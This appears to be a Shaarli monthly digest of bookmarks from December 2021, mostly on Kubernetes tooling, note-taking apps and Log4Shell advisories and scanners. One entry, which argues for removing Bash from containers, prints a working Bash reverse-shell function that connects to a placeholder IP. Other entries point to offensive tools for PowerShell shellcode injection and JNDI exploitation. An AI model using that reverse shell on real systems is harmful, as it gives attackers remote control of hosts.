Monthly Shaarli
December, 2021
While Kubernetes has many advantages, it also brings new security challenges.
This article is part of a series about integrating security tooling in the development process. You can find the rest of the articles here: Part 1: Detecting Insecure Dependencies (SCA)Part 2: Detecting Insecure Source Code (SAST)Note: This tutorial is based on the repository resulting from part 2. If
A plain text note-taking assistant. Contribute to mickael-menu/zk development by creating an account on GitHub.
Shell-operator is a tool for running event-driven scripts in a Kubernetes cluster - GitHub - flant/shell-operator: Shell-operator is a tool for running event-driven scripts in a Kubernetes cluster
The Penetration Testers Framework (PTF) is a way for modular support for up-to-date tools. - GitHub - trustedsec/ptf: The Penetration Testers Framework (PTF) is a way for modular support for up-to-date tools.
Program to reverse Docker images into Dockerfiles. Contribute to P3GLEG/Whaler development by creating an account on GitHub.
Before attacking any website, a hacker or penetration tester will first compile a list of target surfaces. After they've used some good recon and found the right places to point their scope at, they'll use a web server scanning tool such as Nikto for hunting down vulnerabilities that could be potential attack vectors.
Operational information regarding the vulnerability in the Log4j logging library. - log4shell/README.md at main · NCSC-NL/log4shell
Within the last 10 hours (current time 10:00 am Pacific, 10 December 21), there has been a severe RCE 0-day exploit found in the Java library log4j that when used, results in a Remote Code Execution…
Simply if you thought it was secure to loosen up for the weekend…
Easily check your clusters for use of deprecated APIs
Kubernetes 1.16 is slowly starting to roll out, not only across various managed Kubernetes offerings, and with that come a lot of API deprecations1.
Kube No Trouble (kubent) is a simple tool to check whether you're using any of these API versions in your cluster and therefore should upgrade your workloads first, before upgrading your Kubernetes cluster.
This tool will be able to detect deprecated APIs depending on how you deploy your resources, as we need the original manifest to be stored somewhere. In particular following tools are supported:
A plugin for Kubernetes command-line tool kubectl, which allows you to convert manifests between different API versions. This can be particularly helpful to migrate manifests to a non-deprecated api version with newer Kubernetes release. For more info, visit migrate to non deprecated apis
Elasticsearch backup / restore for HCL Connections
A cool collection of useful markdown links.
Flame is self-hosted startpage for your server. Easily manage your apps and bookmarks with built-in editors. - GitHub - pawelmalak/flame: Flame is self-hosted startpage for your server. Easily manage your apps and bookmarks with built-in editors.
A simple Bash reverse shell like this one is a good reason to remove Bash from your containers. It uses Bash’s virtual /dev/tcp/ filesystem, and is not exploitable in sh, which doesn’t include this oft-abused feature:
revshell() {
local TARGET_IP="${1:-123.123.123.123}";
local TARGET_PORT="${2:-1234}";
while :; do
nohup bash -i &> \
/dev/tcp/${TARGET_IP}/${TARGET_PORT} 0>&1;
sleep 1;
done
}
Resources, links, projects, and ideas for gardeners tending their digital notes on the public interwebs - GitHub - MaggieAppleton/digital-gardeners: Resources, links, projects, and ideas for gardeners tending their digital notes on the public interwebs
On December 9, 2021, security researchers announced a zero-day vulnerability, CVE-2021-44228, impacting the widely-used Apache Log4j Java-based logging library. Known as Log4Shell, the vulnerability can allow unauthenticated remote code execution and access to servers.
Automate creating resilient, disposable, secure and agile infrastructure for Red Teams - GitHub - byt3bl33d3r/Red-Baron: Automate creating resilient, disposable, secure and agile infrastructure for Red Teams
Scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too! - GitHub - mergebase/log4j-detector: Scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too!
Just when you thought it was safe to relax for the weekend... a critical bug showed up in Apache's Log4j product
Understanding Log4Shell: the Apache log4j2 Remote Code Execution Vulnerability (CVE-2021-44228)
The “Log4Shell” vulnerability has triggered a lot of interest in JNDI Injection exploits. Unfortunately, regarding exploitability there seems to go a bit of misinformation around. TLDR: A current Java runtime version won’t safe you. Do patch.
Kubeconform is a Kubernetes manifests validation tool. Build it into your CI to validate your Kubernetes configuration!
It is inspired by, contains code from and is designed to stay close to Kubeval, but with the following improvements:
high performance: will validate & download manifests over multiple routines, caching downloaded files in memory
configurable list of remote, or local schemas locations, enabling validating Kubernetes custom resources (CRDs) and offline validation capabilities
uses by default a self-updating fork of the schemas registry maintained by the kubernetes-json-schema project - which guarantees up-to-date schemas for all recent versions of Kubernetes.
How do you manage big projects (hundreds of files) using only VIM? I personally start having problems in any larger than small project. is there any way to quickly 'go to file', preferably with n...
Nice page created with Hugo. Page and theme source available on GitLab.
Remote repository management made easy. Contribute to x-motemen/ghq development by creating an account on GitHub.
Automatic window tiling, window tagging and full keyboard navigation for Linux desktop environments
Deciduous is a security decision tree generator that serves as a threat modeling tool for engineering teams who want to create attack trees in the spirit of Security Chaos Engineering
Laden Sie Update Scanner für Firefox herunter. Überprüft Webseiten auf Aktualisierungen und benachrichtigt Sie. Besonders nützlich bei Seiten, die keine Atom- oder RSS-Feeds anbieten.
Future-proof note-taking and publishing based on Zettelkasten - GitHub - srid/neuron: Future-proof note-taking and publishing based on Zettelkasten
AALIS, short for Advanced ArchLinux Install Script, is a script I created in order to help me quickly install ArchLinux along with most of the packages/configurations I use...
This is the ultimate list of resources for beginner hackers from Hakluke which includes the best blogs, influencers, youtube channels, etc.
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. - GitHub - trustedsec/unicorn: Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Securing applications is not the easiest thing to do. An application has many components: server-side logic, client-side logic, data storage, data transportation, API, and more. With all these…
Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources. This issue covers the week from December 6 to 13. Intigriti news […]
‘Scope and potential impact unlike any component vulnerability I can recall’
JNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc) - GitHub - welk1n/JNDI-Injection-Exploit: JNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)
Purpose
Kubernetes sometimes deprecates apiVersions. Most notably, a large number of deprecations happened in the 1.16 release. This is fine, and it's a fairly easy thing to deal with. However, it can be difficult to find all the places where you might have used a version that will be deprecated in your next upgrade.
You might think, "I'll just ask the api-server to tell me!", but this is fraught with danger. If you ask the api-server to give you deployments.v1.apps, and the deployment was deployed as deployments.v1beta1.extensions, the api-server will quite happily convert the api version and return a manifest with apps/v1. This is fairly well outlined in the discussion in this issue.
So, long story short, finding the places where you have deployed a deprecated apiVersion can be challenging. This is where pluto comes in. You can use pluto to check a couple different places where you might have placed a deprecated version:
This blog post shows tips and tricks to write resilient and idempotent bash scripts.
Configure the goldmark markdown renderer in hugo.
